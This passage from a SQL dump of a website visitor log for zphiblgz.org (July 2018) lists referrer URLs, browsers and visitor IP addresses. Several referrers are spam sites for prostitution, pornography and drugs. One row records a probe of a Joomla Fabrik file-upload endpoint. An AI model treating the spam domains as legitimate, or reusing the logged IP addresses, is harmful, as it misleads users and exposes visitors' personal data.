search%3Bimages%3B%3B&text=&etext=1849.k5VidlaORSZflKAcP0Oq7zHfSnjtt9Ms9T0i17RI-OY.4eb572d9312548a58530ed7c33c151a78abd83e9&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041Z0FtSEo0R3ZERmZURVdWVDFoY3NUcVdXVzVpQ1RuZ21wZHpINVJPaVlHUSws&sign=35061f23d3783ce52579dd65ff70e2bc&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','178.62.98.169','000',2,0),(33203,'2018-07-15','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1849.6st8e5l_I_aUvXAuO17jwsecPq9HDc_CE-xvWTW8Kww.e73e3161256b626a10bd9790d5231075cb56b998&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041YTZmandxLWljeDNQOFFJMzlxemlrakJVdTBhOG5iaDNYX0hlUGFWR25QZyws&sign=5329412464ab664dc22fb2b5b823e8c3&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','192.81.209.50','000',2,0),(33204,'2018-07-15','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1849.MhcgIwCsZlaY80BGnqH_SdrQXgJibV-2drjtYE7z5F4.714cd7e7766c299afc47d82528303c063d27b6ab&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041UEZmN3hTN1psM0NVYXM1SWVNUWtVSWgyYkoza2p3ZERPTE0xeHhhZjVCZyws&sign=4b7953d2cc046d5307448e606135d918&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.226.164.247','000',2,0),(33205,'2018-07-15','http://metallosajding.ru/','MSIE','Windows','6.0','','178.137.86.234','000',3,0),(33206,'2018-07-15','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.27','000',2,0),(33207,'2018-07-15','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.27','000',1,0),(33208,'2018-07-15','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.31','000',1,0),(33209,'2018-07-15','http://dosugrostov.site/','MSIE','Windows','5.5','','178.137.160.220','000',4,0),(33210,'2018-07-15','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.189.49','000',1,0),(33211,'2018-07-15','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.31','000',1,0),(33212,'2018-07-15','http://zphiblgz.org/service/appa/','Safari','iPhone','7.0','','40.77.178.223','000',1,0),(33213,'2018-07-15','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.27','000',1,0),(33214,'2018-07-15','https://zphiblgz.org','Chrome','Linux','65.0.3325.181','','138.197.111.120','000',3,0),(33215,'2018-07-15','https://zphiblgz.org','Chrome','Windows','49.0.2645.36','','80.122.49.54','000',2,0),(33216,'2018-07-15','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',4,0),(33217,'2018-07-15','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',2,0),(33218,'2018-07-15','https://zphiblgz.org','Opera Next','Windows','36.0.2130.32','','51.140.205.52','000',5,0),(33219,'2018-07-15','https://zphiblgz.org','Chrome','Windows','66.0.3359.181','','46.165.254.166','000',1,0),(33220,'2018-07-15','https://www.google.com/','Chrome','Chrome OS','67.0.3396.99','','107.12.156.69','000',4,0),(33221,'2018-07-15','https://zphiblgz.org','python-requests','Unknown','2.9.1','','188.166.34.95','000',1,0),(33222,'2018-07-15','https://zphiblgz.org/','Chrome','Windows','67.0.3396.87','','37.32.32.240','000',2,0),(33223,'2018-07-15','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.30','000',1,0),(33224,'2018-07-15','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.30','000',1,0),(33225,'2018-07-15','http://zphiblgz.org/','Chrome','Windows','53.5.0960.5698','','181.214.87.231','000',2,0),(33226,'2018-07-15','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.188.51','000',1,0),(33227,'2018-07-15','https://zphiblgz.org','MSIE','Macintosh','42.0','','18.191.198.224','000',2,0),(33228,'2018-07-15','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.29','000',1,0),(33229,'2018-07-15','https://russian-translator.com/','MSIE','Windows','2.0d','','178.137.16.67','000',2,0),(33230,'2018-07-15','https://zphiblgz.org','Firefox','Linux','42.0','','18.191.198.224','000',2,0),(33231,'2018-07-15','http://prostitutki-rostova.ru.com/','MSIE','Windows','6.0','','178.159.37.70','000',3,0),(33232,'2018-07-15','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.27','000',1,0),(33233,'2018-07-15','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.27','000',1,0),(33234,'2018-07-15','https://zphiblgz.org','MSIE','Windows','11.0','','69.12.66.254','000',2,0),(33235,'2018-07-15','https://zphiblgz.org','Firefox','Windows','40.1','','91.64.113.120','000',2,0),(33236,'2018-07-15','https://russian-postindex.ru/','MSIE','Windows','5.5','','178.137.16.67','000',1,0),(33237,'2018-07-15','http://l.facebook.com/l.php?u=http%3A%2F%2Fzphiblgz.org%2F&h=AT3jAcKDwRUkO1xQvhSIHJVV8s2UD5isbttSgHNwLxHr8dPexKeacqnYWdAVuyziykTLp2oirm4CEPuPXVN8q6GKsdW_RVIP5BLPILQhEN-JZ4ZWGvQm-1m00GAKlqfZkSLQGpe08JWjuA','Edge','Windows','17.17134','','173.252.98.118','000',3,0),(33238,'2018-07-15','https://www.google.com/','Safari','iPhone','604.1','','69.143.152.61','000',2,0),(33239,'2018-07-15','https://zphiblgz.org/','Unknown','Unknown','Unknown','','80.87.184.49','000',2,0),(33240,'2018-07-15','https://ask-yug.com/','MSIE','Windows','5.0','','178.137.86.234','000',2,0),(33241,'2018-07-16','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.28','000',1,0),(33242,'2018-07-16','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.28','000',1,0),(33243,'2018-07-16','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','213.32.113.2','000',2,0),(33244,'2018-07-16','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.28','000',1,0),(33245,'2018-07-16','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.29','000',1,0),(33246,'2018-07-16','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.29','000',1,0),(33247,'2018-07-16','https://zphiblgz.org','Firefox','Linux','5.0','','37.187.56.47','000',29,0),(33248,'2018-07-16','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.27','000',1,0),(33249,'2018-07-16','https://zphiblgz.org','Chrome','Windows','9.0.597.94','','208.80.194.31','000',1,0),(33250,'2018-07-16','http://03e.info/','Opera','Windows','8.01','','178.137.160.220','000',1,0),(33251,'2018-07-16','http://xn-----6kcamwewcd9bayelq.xn--p1ai/','MSIE','Windows','6.0','','37.229.254.233','000',6,0),(33252,'2018-07-16','http://modnie-futbolki.net/','MSIE','Windows','5.5','','46.119.125.180','000',5,0),(33253,'2018-07-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','150.95.150.229','000',2,0),(33254,'2018-07-16','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.57.233.99','000',2,0),(33255,'2018-07-16','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.189.225','000',1,0),(33256,'2018-07-16','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.28','000',1,0),(33257,'2018-07-16','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.28','000',1,0),(33258,'2018-07-16','https://yandex.ru/clck/jsredir?from=yandex.ru%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1850.6cuK7StFwOk1kxpDGcvxe7GJRLaKsdcOdQuvcAd-VMQ.4056fa4adf7c6921e0415450b825ea3c63f297f5&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042N1AzRmpUbWlnZjNtb2pBR1VuS2FmcEt1VFlocWxsS1FaNzRYcHJlZ1Uwdyws&sign=24a8615ba3ba98c2fa5d67a83f0ab9bd&keyno=0&b64e=2&l10n=ru','Firefox','Linux','52.0','','77.73.70.135','000',2,0),(33259,'2018-07-16','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1850.eoz49Kuh3X-cDVIRquR7dV_Xbam8VW8uqgTsAqEsNZI.33a86bd016cf0f846408f99741c7a52f95037a30&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041c1N6VWZpMC1Yd3F0V2lUX19uZGVBRDhuci1YamVZSTlKSzN3dlhKc0F0dyws&sign=a4f364ee4c0fcc4b9c8627064ae30fe1&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.65.17.193','000',2,0),(33260,'2018-07-16','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1850.YkojDtoi58qHg_QVG0dZsQd35mXAThFn1vC7qa-aJL8.b7ada1e02c564d26c1c3dc19a35d6404b49f18cc&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042SDQ3RG9kMENsY01SVzZwTHVqV2tiNFJlSUFzdnlQUzhadEh4dmF5em1Hdyws&sign=73a5314157952bc3634c46d523261643&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','104.131.47.85','000',2,0),(33261,'2018-07-16','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1850.IsdqhfdxLFdeDpAlstCFsZwQqop4qy3jjmFbGShiNUM.64965d94284fddf0e056d2a063b16aea315d336f&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041QnkxeUtCYk16dHlfWkNxbi1vekpYTUZWYWhyVGlkSFV1a1VicVZVTkZ3QSws&sign=0f1e5c506a2a47e61467b8fe09c73ba2&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','89.145.162.191','000',2,0),(33262,'2018-07-16','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.32','000',1,0),(33263,'2018-07-16','https://zphiblgz.org','libwww-perl','Unknown','6.13','','45.76.64.95','000',4,0),(33264,'2018-07-16','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.32','000',1,0),(33265,'2018-07-16','https://manimpotence.com/','MSIE','Windows','6.0','','178.137.86.234','000',1,0),(33266,'2018-07-16','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','52.53.201.78','000',2,0),(33267,'2018-07-16','https://zphiblgz.org','Chrome','Windows','67.0.3396.99','','185.234.217.142','000',1,0),(33268,'2018-07-16','https://www.google.com/','Safari','iPhone','11.0','','38.106.114.196','000',2,0),(33269,'2018-07-16','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.30','000',1,0),(33270,'2018-07-16','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',4,0),(33271,'2018-07-16','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.29','000',1,0),(33272,'2018-07-16','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.32','000',1,0),(33273,'2018-07-16','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.32','000',1,0),(33274,'2018-07-16','https://zphiblgz.org','Chrome','Windows','66.0.3359.181','','46.229.237.87','000',1,0),(33275,'2018-07-16','http://medicineseasybuy.com/','MSIE','Windows','5.5','','178.137.160.220','000',1,0),(33276,'2018-07-16','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.189.137','000',1,0),(33277,'2018-07-16','https://www.google.com/','Safari','iPhone','11.0','','68.58.200.70','000',3,0),(33278,'2018-07-16','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.31','000',1,0),(33279,'2018-07-16','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.31','000',1,0),(33280,'2018-07-16','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.32','000',1,0),(33281,'2018-07-16','http://www.zphibmaryland.org/chapters/','Safari','iPhone','604.1','','173.69.169.221','000',3,0),(33282,'2018-07-16','https://zphiblgz.org','Safari','iPhone','11.0','','173.69.169.221','000',5,0),(33283,'2018-07-16','http://xn-----6kcamwewcd9bayelq.xn--p1ai/','MSIE','Windows','6.0','','37.229.254.170','000',1,0),(33284,'2018-07-16','http://prostitutki-rostova.ru.com/','MSIE','Windows','6.0','','178.159.37.70','000',3,0),(33285,'2018-07-16','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.31','000',1,0),(33286,'2018-07-16','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.31','000',1,0),(33287,'2018-07-16','http://metallosajding.ru/','MSIE','Windows','4.01','','178.137.86.234','000',3,0),(33288,'2018-07-16','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.35','000',1,0),(33289,'2018-07-17','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','164.132.137.175','000',2,0),(33290,'2018-07-17','http://xn----ctbigni3aj4h.xn--p1ai/','MSIE','Windows','6.0','','37.229.254.170','000',3,0),(33291,'2018-07-17','https://zphiblgz.org/','Safari','iPhone','11.0','','173.69.169.221','000',2,0),(33292,'2018-07-17','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.28','000',1,0),(33293,'2018-07-17','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.28','000',1,0),(33294,'2018-07-17','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.28','000',1,0),(33295,'2018-07-17','https://zphiblgz.org','MSIE','Windows','11.0','','188.240.208.26','000',2,0),(33296,'2018-07-17','https://atleticpharm.org/','Opera','Windows','9.00','','178.137.160.220','000',1,0),(33297,'2018-07-17','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1850.nR2JX6LIFCuRXiLB-phcGx19GwOVc1wXayakE18V1BQ.d4ba7d23d60b5a7546d36fae03db4013166e8b08&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042Q2ZxZlEyWFdwd2c3UmplRXVwdkpSQVpMWGFKMWhLZ0ROSTMwdVg5Y1h1QSws&sign=e8c8c15fe348592708591337872bac6e&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','162.243.12.169','000',2,0),(33298,'2018-07-17','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1850.mR2-Yl832fDBHskxW99fCoeOHbFa-TBaZUF1lCa1CyM.740f2e970ae82e5d47152f3e7a0c2e841961327c&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040MVBxM1ptdElmd1cycHRfVEtQb1dUdEYwMkdnbXJwOVhpM2xuQ1ZCWDdrZyws&sign=eb344c41db7e606a79ffafa83960e033&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.234.75','000',2,0),(33299,'2018-07-17','https://zphiblgz.org','Firefox','Windows','40.1','','78.87.96.57','000',2,0),(33300,'2018-07-17','http://porno-chaman.info/','MSIE','Windows','5.5','','178.137.160.220','000',2,0),(33301,'2018-07-17','https://bpro1.top/','MSIE','Windows','6.0','','178.137.86.234','000',4,0),(33302,'2018-07-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','107.170.61.169','000',2,0),(33303,'2018-07-17','https://mybuh.kz/','MSIE','Windows','6.0','','178.137.16.67','000',3,0),(33304,'2018-07-17','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.27','000',1,0),(33305,'2018-07-17','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',4,0),(33306,'2018-07-17','https://zphiblgz.org','Chrome','Windows','59.0.3071.115','','95.213.224.199','000',5,0),(33307,'2018-07-17','https://zphiblgz.org','Chrome','Windows','59.0.3071.115','','95.213.224.215','000',2,0),(33308,'2018-07-17','https://zphiblgz.org','Chrome','Windows','59.0.3071.115','','95.213.224.218','000',4,0),(33309,'2018-07-17','https://zphiblgz.org','Chrome','Windows','59.0.3071.115','','95.213.224.202','000',2,0),(33310,'2018-07-17','https://zphiblgz.org','Chrome','Windows','59.0.3071.115','','95.213.224.203','000',3,0),(33311,'2018-07-17','https://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.125','000',1,0),(33312,'2018-07-17','http://xn----8sblgmbj1a1bk8l.xn----161-4vemb6cjl7anbaea3afninj.xn--p1ai/','MSIE','Windows','6.0','','37.229.254.233','000',3,0),(33313,'2018-07-17','https://zphiblgz.org','Chrome','Macintosh','39.0.2171.95','','104.237.4.130','000',2,0),(33314,'2018-07-17','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.31','000',1,0),(33315,'2018-07-17','https://zphiblgz.org','Chrome','Windows','67.0.3396.99','','125.80.133.58','000',1,0),(33316,'2018-07-17','https://zphiblgz.org','Chrome','Windows','67.0.3396.99','','125.80.129.255','000',1,0),(33317,'2018-07-17','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','101.199.121.77','000',2,0),(33318,'2018-07-17','http://zphiblgz.org/','MSIE','Windows','8.0','','106.120.160.109','000',3,0),(33319,'2018-07-17','https://zphiblgz.org','Chrome','Windows','36.0.1985.125','','101.199.110.112','000',2,0),(33320,'2018-07-17','https://zphiblgz.org','Chrome','Windows','36.0.1985.125','','101.199.110.110','000',2,0),(33321,'2018-07-17','http://zphiblgz.org/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload','Chrome','Windows','42.0.2311.152','','193.201.224.210','000',2,0),(33322,'2018-07-17','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.177.27','000',1,0),(33323,'2018-07-17','http://prostitutki-spb.spb.ru/','Opera','Windows','7.60','','178.137.16.67','000',1,0),(33324,'2018-07-17','https://hyip-zanoza.me/','Opera','Windows','7.54','','46.119.125.180','000',3,0),(33325,'2018-07-17','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.32','000',1,0),(33326,'2018-07-17','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.32','000',1,0),(33327,'2018-07-17','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','23.94.66.127','000',1,0),(33328,'2018-07-17','https://zphiblgz.org','Opera','Windows','8.50','','23.94.66.127','000',1,0),(33329,'2018-07-17','https://infektsii.com/','MSIE','Windows','4.01','','46.119.125.180','000',2,0),(33330,'2018-07-17','https://zphiblgz.org','Firefox','Windows','40.1','','179.6.197.103','000',2,0),(33331,'2018-07-17','https://impotentik.com/','Unknown','Unknown','Unknown','','178.137.86.234','000',2,0),(33332,'2018-07-17','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','83.136.254.53','000',2,0),(33333,'2018-07-18','http://xn-----6kcamwewcd9bayelq.xn--p1ai/','MSIE','Windows','6.0','','37.229.254.233','000',3,0),(33334,'2018-07-18','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.30','000',1,0),(33335,'2018-07-18','https://www.google.com/','Chrome','Macintosh','66.0.3359.139','','108.5.187.213','000',1,0),(33336,'2018-07-18','http://zphiblgz.org/','Chrome','Windows','32.0.1700.107','','193.169.252.17','000',3,0),(33337,'2018-07-18','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.31','000',1,0),(33338,'2018-07-18','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.30','000',1,0),(33339,'2018-07-18','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.30','000',2,0),(33340,'2018-07-18','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.35','000',1,0),(33341,'2018-07-18','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.35','000',1,0),(33342,'2018-07-18','http://03e.info/','MSIE','Windows','6.0','','178.159.37.70','000',3,0),(33343,'2018-07-18','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.188.52','000',1,0),(33344,'2018-07-18','https://zphiblgz.org','Firefox','Windows','57.0','','82.102.21.211','000',2,0),(33345,'2018-07-18','https://zphiblgz.org/','Firefox','Windows','57.0','','196.52.84.44','000',2,0),(33346,'2018-07-18','https://zphiblgz.org/','Firefox','Windows','57.0','','89.238.154.164','000',3,0),(33347,'2018-07-18','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1852.z4OEsJmkkNuz6TQwJbHy_t2yF-5qOZqf93C_pj7nFzo.0bf8909673a02e6b1dffef74d7fc1778f23c1afe&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040TDRBVkdBaVp2MjI0SXRRUXdyWkZ6SzZHMURSY3dWRThwd0V0UFNwaUF6Zyws&sign=34b60dc0fc20933ca92ac95b2cfec12c&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','138.197.209.193','000',2,0),(33348,'2018-07-18','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1852.0lZf90M7nd7zDua0f40T5pSDM5KGOv1vxwtZ5Ix3rgs.5c8d2c58cb44fb4c57c4494ed066d3c34b7e31ab&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042d25RNTlDSEJBNkMzVWs4bm93NVBrX1pwS0VnOTU2cHRMSGRCb01KUExqZyws&sign=230a274a4d2a2b347ba8bad5310d18d2&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','83.136.249.195','000',2,0),(33349,'2018-07-18','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.28','000',2,0),(33350,'2018-07-18','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1852.p_046HvV5HSFF0a4GNFBMJMqx1xTkbSnljvcYSHwuOU.acc5db66ab133b875df9bbf03feb485c821def71&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043R2lhNUdPMFF0eEg5bzVDMjM2WElieTJYLXh5TURkN0E0RmZCSm5HYl9PQSws&sign=cee81eb41419a63f643b7ed667814aaf&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','46.101.189.44','000',2,0),(33351,'2018-07-18','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1852.BxrnCR3qcQDaawFeCe8XrJbM-VdOSUiDBWThTfo9mOk.ad849eea39e21812ad76eb2a6752c370f408e4f1&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040X3g0ZURmNy1SbmhHemZWMG9hYUlTTlhfQXMzaXFScks3bGJoVGNxeDVTdyws&sign=e182077686783ba3cb77053cb421935d&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.193.5','000',2,0),(33352,'2018-07-18','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.32','000',1,0),(33353,'2018-07-18','https://zphiblgz.org','Safari','iPhone','11.0','','172.58.172.212','000',3,0),(33354,'2018-07-18','https://zphiblgz.org','Firefox','Windows','61.0','','51.254.114.91','000',2,0),(33355,'2018-07-18','http://metallosajding.ru/','Unknown','Unknown','Unknown','','178.137.86.234','000',2,0),(33356,'2018-07-18','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.29','000',1,0),(33357,'2018-07-18','https://zphiblgz.org','Firefox','Macintosh','5.0.1','','208.80.194.29','000',1,0),(33358,'2018-07-18','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.29','000',1,0),(33359,'2018-07-18','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.29','000',1,0),(33360,'2018-07-18','http://modnie-futbolki.net/','MSIE','Windows','6.0','','46.119.125.180','000',3,0),(33361,'2018-07-18','https://russian-translator.com/','MSIE','Windows','6.0','','178.137.16.67','000',1,0),(33362,'2018-07-18','http://zphiblgz.org/index.php?d1','MSIE','Windows','6.0','','27.72.164.38','000',1,0),(33363,'2018-07-18','https://zphiblgz.org','SafeDNSBot','Unknown','Unknown','','188.166.57.237','000',2,0),(33364,'2018-07-18','https://www.bing.com/','MSIE','Windows','11.0','','164.82.32.13','000',2,0),(33365,'2018-07-18','http://xn----ctbigni3aj4h.xn--p1ai/','MSIE','Windows','6.0','','37.229.254.170','000',3,0),(33366,'2018-07-18','https://zphiblgz.org','Test','Unknown','Unknown','','73.76.78.161','000',1,0),(33367,'2018-07-18','https://rent2spb.ru/','MSIE','Windows','6.0','','46.119.124.149','000',3,0),(33368,'2018-07-18','https://zphiblgz.org','Chrome','Windows','40.0.2214.85','','138.246.253.5','000',1,0),(33369,'2018-07-18','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','198.23.174.173','000',1,0),(33370,'2018-07-18','http://ruspoety.ru/','MSIE','Windows','6.0','','37.115.185.48','000',2,0),(33371,'2018-07-18','https://xn----8sbarihbihxpxqgaf0g1e.xn--80adxhks/','Opera','Windows','9.01','','46.119.124.149','000',1,0),(33372,'2018-07-18','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',4,0),(33373,'2018-07-18','http://172.26.2.51:15871/cgi-bin/blockOptions.cgi?ws-session=-1723062692','Chrome','Windows','67.0.3396.99','','156.33.241.37','000',10,0),(33374,'2018-07-18','https://www.google.com/','Safari','Macintosh','11.1.1','','162.129.251.18','000',3,0),(33375,'2018-07-18','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','52.53.201.78','000',2,0),(33376,'2018-07-18','https://zphiblgz.org','AppleWebKit','Macintosh','605.1.15','','173.69.169.221','000',1,0),(33377,'2018-07-18','https://zphiblgz.org','Safari','iPhone','11.0','','173.69.169.221','000',1,0),(33378,'2018-07-18','https://www.google.com/','Chrome','Windows','62.0.3202.89','','192.30.51.10','000',2,0),(33379,'2018-07-18','http://03e.info/','MSIE','Windows','5.5','','46.119.124.149','000',2,0),(33380,'2018-07-18','https://zphiblgz.org','curl','Unknown','7.47.0','','51.15.80.69','000',2,0),(33381,'2018-07-18','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.28','000',1,0),(33382,'2018-07-18','http://sladkoevideo.com/','MSIE','Windows','5.5','','178.137.85.122','000',3,0),(33383,'2018-07-18','https://www.google.com/','Safari','iPhone','11.0','','67.190.159.74','000',2,0),(33384,'2018-07-18','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.